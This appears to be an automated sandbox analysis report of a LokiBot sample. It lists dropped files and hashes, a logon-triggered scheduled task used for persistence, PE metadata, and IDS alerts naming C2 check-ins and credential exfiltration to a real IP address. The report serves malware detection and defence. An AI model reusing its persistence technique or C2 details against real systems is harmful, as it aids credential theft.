SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4qcxujn.vca.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhcy3z0m.otz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp9E72.tmp

Download File

Process:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1565
Entropy (8bit):	5.0842127878717704
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewKv:HeLwYrFdOFzOz6dKrsuqj
MD5:	D6AC8730A7B18B15E14FA225DC41C4B7
SHA1:	22F4FFCF295D5D45FDF37734F7C99C634A7FFA50
SHA-256:	8DD5F43F6C1B6516BE55BBD0C7DA422FCC74A13FE749BB9631BFA217A958DAE9
SHA-512:	D58798F92FE76254E4C6C961FF2B3CE694A14E69031C5206E9438AA402BFA860B9D2A2EA6613EFCB3B2F6588EAC8CB24528473E4C186CBFBE65E661DA4C80E19
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmpB3BF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Xzacmv.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1565
Entropy (8bit):	5.0842127878717704
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewKv:HeLwYrFdOFzOz6dKrsuqj
MD5:	D6AC8730A7B18B15E14FA225DC41C4B7
SHA1:	22F4FFCF295D5D45FDF37734F7C99C634A7FFA50
SHA-256:	8DD5F43F6C1B6516BE55BBD0C7DA422FCC74A13FE749BB9631BFA217A958DAE9
SHA-512:	D58798F92FE76254E4C6C961FF2B3CE694A14E69031C5206E9438AA402BFA860B9D2A2EA6613EFCB3B2F6588EAC8CB24528473E4C186CBFBE65E661DA4C80E19
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\1d921b7dbd459b1bfc7fa12af4fbde00_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
File Type:	data
Category:	modified
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwltJ:Wz
MD5:	3D7D230E8E9B4E8202935E38050E13E5
SHA1:	DFABCB8DCBC48AB136F6F87A29BF4A7C9CCCCAAF
SHA-256:	269E9F79960D5201DA265CEF43575B1EF31644174DA7A9AB23501AD3A0CACFC3
SHA-512:	02BAF2F6CE0222EBFD4186641AC8F8BF8C54D0184A6C4C85F720171EEF8B1871ACCC9F3E522B80C8814428F52B007CE321312A76B4538D59E4A436D43011FF30
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Xzacmv.exe

Download File

Process:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	817152
Entropy (8bit):	6.581464625028686
Encrypted:	false
SSDEEP:	12288:/c0twoIUGj1RyewvMXh/1G/WH7twORvOi:0awbUXgX7GO8i
MD5:	04E3FEF83680D0B3FCF172F1B095BFDE
SHA1:	A0C6645E1990FBFF34A5D85133D43D52B094125B
SHA-256:	72D3358EA74F770930E44D382A00387F1451399EF01A513D11EF80BA2F9DA653
SHA-512:	B12D1B396B0A857AD48D22AB250A0F75BF82C134CEFD5BF8591D33B2942755C3CF517000551FE609EDDA73CB9762FBD8C70E54D4089F4BEA7F285CD85A0D0E5A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._................0..n..........:.... ........@.. ....................................@....................................O....................................s..p............................................ ............... ..H............text...@l... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H............R......J...................................................0............}......}.....(.......(......{...........%.r...p(....s.....%.r...p(....s.....%.r%..p(....s.......o.......(...+....-....o....&..0...........s2.....o.......0...........sA.....o.......0...........s/.....o.......0...........s8.....o.......0...........s;.....o.......0...........s>.....o.......0...........s5.....o.......0...........sD.....o.......0...........sG.....o.......0...........s .

C:\Users\user\AppData\Roaming\Xzacmv.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\oAUBqI6vQ7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	2464
Entropy (8bit):	3.2482668111746746
Encrypted:	false
SSDEEP:	24:QOaqdmuF3rm+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxwC:FaqdF7m+AAHdKoqKFxcxkFm
MD5:	A11AE6BD04D1A20E4DE839101DE9D8BA
SHA1:	4D3885176F0A535FC830EBB315F37E0FAA34F7B5
SHA-256:	86C8DD2349A0671D9D78BFC1A7BB4FFA1218EE6CF37226DB67B4F78CF15F4463
SHA-512:	7D1583FABCAEB8CDC03E9CA640A37561AE44DAA81CDB11B2720D7F2D2E67ED374F037B6FF00EEF2880EBBBADE1DA7AAF8B698930A652EF1D1D9725C906DE669B
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 1.0. .. 2.0.2.5. .1.7.:.4.0.:.1.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e........................................ .W.S.C. .S.t.a.t.e. .I.n.f.o. ................................................................. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. ..............................d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.581464625028686
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	oAUBqI6vQ7.exe
File size:	817'152 bytes
MD5:	04e3fef83680d0b3fcf172f1b095bfde
SHA1:	a0c6645e1990fbff34a5d85133d43d52b094125b
SHA256:	72d3358ea74f770930e44d382a00387f1451399ef01a513d11ef80ba2f9da653
SHA512:	b12d1b396b0a857ad48d22ab250a0f75bf82c134cefd5bf8591d33b2942755c3cf517000551fe609edda73cb9762fbd8c70e54d4089f4bea7f285cd85a0d0e5a
SSDEEP:	12288:/c0twoIUGj1RyewvMXh/1G/WH7twORvOi:0awbUXgX7GO8i
TLSH:	D005723D09BD22EB80A6C79DCBE89827F610A46F7150ADA494D647A53357F4B34C323E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.................0..n..........:.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4c8c3a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9FC81C5F [Sat Dec 12 12:36:47 2054 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8be5	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xca000	0x5c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc7394	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc6c40	0xc6e00	0d26af69bd095500cd8462568cddb094	False	0.6237920333123822	data	6.587713489097932	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xca000	0x5c4	0x600	8081ca1436af54fe4ef6e1af914967d2	False	0.4309895833333333	data	4.126385401557078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xcc000	0xc	0x200	74f9486dd040dfc5d1fc5b2519df5cfd	False	0.044921875	data	0.09409792566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xca090	0x334	data			0.43902439024390244
RT_MANIFEST	0xca3d4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:39:30.033217+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.033217+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.033217+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.747575+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.9	49775	94.156.177.41	80	TCP
2025-01-10T23:39:30.983574+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:30.983574+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:30.983574+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:31.698159+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.9	49782	94.156.177.41	80	TCP
2025-01-10T23:39:31.786336+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:31.786336+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:31.786336+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:32.526294+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:32.526294+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49789	94.156.177.41	80	TCP
2025-01-10T23:39:32.762986+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:32.762986+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:32.762986+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:33.496857+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:33.496857+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49795	94.156.177.41	80	TCP
2025-01-10T23:39:33.668904+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:33.668904+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:33.668904+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:34.373550+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:34.373550+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49802	94.156.177.41	80	TCP
2025-01-10T23:39:34.550687+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:34.550687+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:34.550687+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:35.278795+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:35.278795+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49808	94.156.177.41	80	TCP
2025-01-10T23:39:35.593982+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:35.593982+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:35.593982+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:36.347969+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:36.347969+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49814	94.156.177.41	80	TCP
2025-01-10T23:39:36.524977+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:36.524977+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:36.524977+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:37.275030+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:37.275030+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49824	94.156.177.41	80	TCP
2025-01-10T23:39:37.475403+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:37.475403+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:37.475403+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:38.209511+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:38.209511+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49829	94.156.177.41	80	TCP
2025-01-10T23:39:38.368872+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:38.368872+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:38.368872+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.065651+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.065651+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49836	94.156.177.41	80	TCP
2025-01-10T23:39:39.255080+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:39.255080+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:39.255080+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:39.984096+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:39.984096+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49842	94.156.177.41	80	TCP
2025-01-10T23:39:40.181219+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:40.181219+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:40.181219+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:40.887725+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:40.887725+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-10T23:39:41.043838+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.043838+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.043838+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.794660+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.794660+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49856	94.156.177.41	80	TCP
2025-01-10T23:39:41.946366+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:41.946366+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:41.946366+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:42.649680+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:42.649680+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-10T23:39:42.804638+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:42.804638+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:42.804638+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:43.541295+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:43.541295+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-10T23:39:43.700209+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:43.700209+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49876	94.156.177.41	80	TCP
